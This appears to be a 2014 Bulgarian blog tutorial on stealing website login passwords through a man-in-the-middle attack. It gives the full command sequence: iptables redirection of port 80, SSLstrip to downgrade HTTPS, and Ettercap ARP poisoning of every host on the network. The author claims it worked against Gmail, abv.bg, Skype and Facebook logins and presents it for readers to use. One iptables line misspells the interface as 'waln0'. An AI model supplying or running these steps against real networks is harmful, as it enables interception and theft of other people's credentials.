събота, 22 февруари 2014 г.

Подслушване на мрежа за пароли с Ettercap и SSLstrip


Здравейте в тази публикация ще разясня как става визмането на пароли за логин в различни сайтове ... Лично аз съм го тествал за сайтове като gmail.com abv.bg  skype.com facebook.com (без двуфакторна идентификация)
Това е друг вид MITM атака с която ще ви запозная.Като за начало трябва да имате BackTrack и програми към него Ettercap и SSLstrip.
Ettercap - http://ettercap.github.io/ettercap/
SSLstrip - http://www.thoughtcrime.org/software/sslstrip/
Уверете се че те са ъпдейтнати до последни версии.....

Започваме действайте под руут
  1. Конфигуриране на iptables
     iptables --flush
     iptables --table nat --flush
     iptables --delete-chain
     iptables --table nat --delete-chain
     echo 1 > /proc/sys/net/ipv4/ip_forward 

     iptables -t nat -A PREROUTING -i waln0 -p tcp --destination-port 80 -j REDIRECT --to-port 8080   

Тук wlan0  еимето на адаптера през които правим forwarding-a. Тук съм използвал wireless адаптера (wlan0) на моия комп , но можете да ползвате и ethernet адаптерите eth0 eth1 ... и т.н.
Задължително проверете и ifconfig-a имената ..

     2.   Проверка дали всичко е ОК .. iptables -nvL -t nat
     3.   Стартиране на SSLstrip. Влизате в папката кадето сте го свалили и пишете:
            python sslstrip-0.7/sslstrip.py -a -l 8080 
            или ако сте го инсталирали това - sslstrip -a -l 8080
     4.   Стартиране на Ettercap
            ettercap -TqM ARP:REMOTE // // 
            след като сте го стартирали избирате плугин към него remote_browser
 След стартирането на Ettercap проверете дали forwarding-a в /etc/sysctl.conf
които трябва да е така -> net.ipv4.ip_forward = 1 

 Приятно тестване ...